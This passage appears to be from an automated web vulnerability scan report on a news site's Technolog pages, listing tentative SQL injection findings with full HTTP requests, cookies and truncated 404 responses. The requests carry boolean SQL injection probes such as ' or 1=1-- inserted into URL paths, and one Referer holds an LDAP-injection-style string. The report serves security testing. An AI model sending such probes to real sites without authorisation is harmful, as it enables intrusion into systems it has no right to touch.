<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1152911927&amp;do=msnbc.msn.com&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1152911927&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /_news/2011/01/24'%20and%201%3d2--%20/5907778-apple-calls-to-award-woman-10k-she-hangs-up HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:31:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39899

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1131262040&amp;do=msnbc.msn.com&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1131262040&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.83. http://technolog.msnbc.redacted/_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 87273916%20or%201%3d1--%20 and 87273916%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/201187273916%20or%201%3d1--%20/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:28:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=799317169&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=799317169&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /_news/201187273916%20or%201%3d2--%20/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:28:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1557992197&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1557992197&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

1.84. http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 13719482'%20or%201%3d1--%20 and 13719482'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/201113719482'%20or%201%3d1--%20/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:29:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1217443745&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1217443745&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

Request 2

GET /_news/201113719482'%20or%201%3d2--%20/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:29:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=908365687&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=908365687&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.85. http://technolog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_static/feeds/3147.xml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19701695'%20or%201%3d1--%20 and 19701695'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_static/feeds19701695'%20or%201%3d1--%20/3147.xml HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350377678

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 01:24:48 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40121

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=375089076&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=375089076&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></l
...[SNIP]...

Request 2

GET /_static/feeds19701695'%20or%201%3d2--%20/3147.xml HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350377678

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 01:24:49 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40109

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=683616817&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=683616817&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
